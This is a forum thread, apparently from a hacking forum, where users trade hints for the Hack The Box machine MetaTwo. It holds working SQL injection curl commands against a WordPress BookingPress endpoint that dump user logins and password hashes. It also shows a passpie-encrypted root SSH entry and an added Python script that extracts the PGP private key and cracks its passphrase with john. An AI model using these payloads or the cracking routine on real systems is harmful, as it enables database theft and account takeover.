MetaTwo - HTB [Discussion]
(October 30, 2022, 04:29 AM)iloveyouwtf Wrote:
(October 30, 2022, 04:18 AM)SirKonafa Wrote:
(October 29, 2022, 08:01 PM)elliotal53 Wrote:
(October 29, 2022, 07:58 PM)vexxxi Wrote:
(October 29, 2022, 07:55 PM)elliotal53 Wrote: {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."}

You have to use the proper nonce value.


How do I get the nonce value?



Look at the request body when you submit a booking; you will find a wp_nonce attribute which might work for you.


(October 30, 2022, 04:16 AM)iloveyouwtf Wrote:
(October 29, 2022, 07:50 PM)11231123 Wrote:
(October 29, 2022, 07:40 PM)elliotal53 Wrote: How did you get it to work? Mind explaining a bit more?


Get a nonce and then just:

# <nonce>: the _wpnonce value taken from a captured booking request; the payload pads to 9 columns so the UNION lines up
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=<nonce>&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'



Do you think you can help me with the sqli?



1. Get a valid nonce for yourself (read my previous reply).
2. Use the curl command you found.
3. Reconstruct the query to get what you want.

If you want to get info about the tables, you can do:

# [YOUR NONCE]: the _wpnonce value from a captured booking request; the filler 0..7 pads the UNION to 9 columns
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=[YOUR NONCE]&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),0,1,2,3,4,5,6,7 from information_schema.tables-- -' | grep user

Now figure out how you want to get the usernames and passwords; use this reference to know which variables you're looking for in which tables: https://wordpress.org/support/article/resetting-your-password/
Check out the "Through MySQL command line" section; you will get a hint on which columns you're hunting for.



I have problems using conditionals like WHERE; can I send you a PM?


Sure.
Reply
(October 30, 2022, 04:34 AM)SirKonafa Wrote:
Sure.


You have them disabled?
Reply
(October 30, 2022, 04:39 AM)iloveyouwtf Wrote:
You have them disabled?


Yeah, my bad.
Reply
Freshly cracked, enjoy  
Reply
(October 29, 2022, 09:08 PM)loge23 Wrote:
(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP ME


# line number of the first "PRIVATE" marker in passpie's key file, i.e. where the private key block starts
declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`

# passpie prompts for the key passphrase and prints the decrypted entry
passpie copy ssh --to stdout


Cool and well done!
Reply
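The step the two hints above only gesture at, as an added example that is not part of the thread and not passpie's own code: the grep/cut one-liner finds where the PRIVATE marker sits inside .passpie/.keys, which tells you the file holds more than one armored block, so what you actually need is to carve the private key block out whole, hand it to gpg2john/john for the passphrase, and only then let passpie decrypt the entry. The .keys path, the gpg2john/john tool names and the wordlist location are assumptions; the sample key file is constructed placeholder text, not real key material.

```python
"""Added example (not from the thread or from passpie): carve the PGP private
key out of passpie's .keys file so its passphrase can be attacked offline.

Paths, tool names and wordlist in run_offline_attack() are assumptions; the
sample below is placeholder text shaped like a .keys file, not real keys.
"""
import os
import re
import subprocess
import sys

# One armored block: BEGIN line, anything, then the matching END line for the
# same label (PUBLIC KEY BLOCK, PRIVATE KEY BLOCK, MESSAGE, ...).
ARMOR_RE = re.compile(
    r"^-----BEGIN PGP ([A-Z ]+)-----\r?\n.*?^-----END PGP \1-----",
    re.S | re.M,
)


def armored_blocks(text: str) -> dict:
    """Map each block label to its full armored text, in file order."""
    return {m.group(1): m.group(0) for m in ARMOR_RE.finditer(text)}


def private_key_block(text: str) -> str:
    """Return the private key armor from a .keys file, or raise if there is none."""
    blocks = armored_blocks(text)
    if "PRIVATE KEY BLOCK" not in blocks:
        raise ValueError("no PGP private key block found")
    return blocks["PRIVATE KEY BLOCK"]


def run_offline_attack(keys_path=os.path.expanduser("~/.passpie/.keys"),
                       wordlist="/usr/share/wordlists/rockyou.txt"):
    """Carve the key, convert with gpg2john, run john (tools assumed installed; not run on import)."""
    with open(keys_path, encoding="utf-8") as fh:
        priv = private_key_block(fh.read())
    with open("passpie_priv.asc", "w", encoding="utf-8") as fh:
        fh.write(priv + "\n")
    with open("passpie.john", "w") as fh:
        subprocess.run(["gpg2john", "passpie_priv.asc"], stdout=fh, check=True)
    subprocess.run(["john", f"--wordlist={wordlist}", "passpie.john"], check=True)
    subprocess.run(["john", "--show", "passpie.john"], check=True)
    # With the passphrase recovered, the thread's own command does the rest:
    #   passpie copy ssh --to stdout


# Constructed stand-in for .keys: public block first, then the private block.
SAMPLE_KEYS = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBGCgXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
=pub0
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQPGBGCgYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
=prv0
-----END PGP PRIVATE KEY BLOCK-----
"""

if __name__ == "__main__":
    run_offline_attack(*sys.argv[1:])
```

Carving by label rather than by line number means the same function also works when the private block comes first or when a third block is present, which the one-liner's "first PRIVATE match" does not guarantee.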
(October 29, 2022, 09:08 PM)loge23 Wrote:

thanks
Reply
(October 29, 2022, 09:08 PM)chamo20 Wrote:

This has to do with https://github.com/marcwebbie/passpie


Thank you
Reply
thanks bro
Reply
It's not true!!!
Reply
(October 29, 2022, 09:08 PM)loge23 Wrote:


Thanks
Reply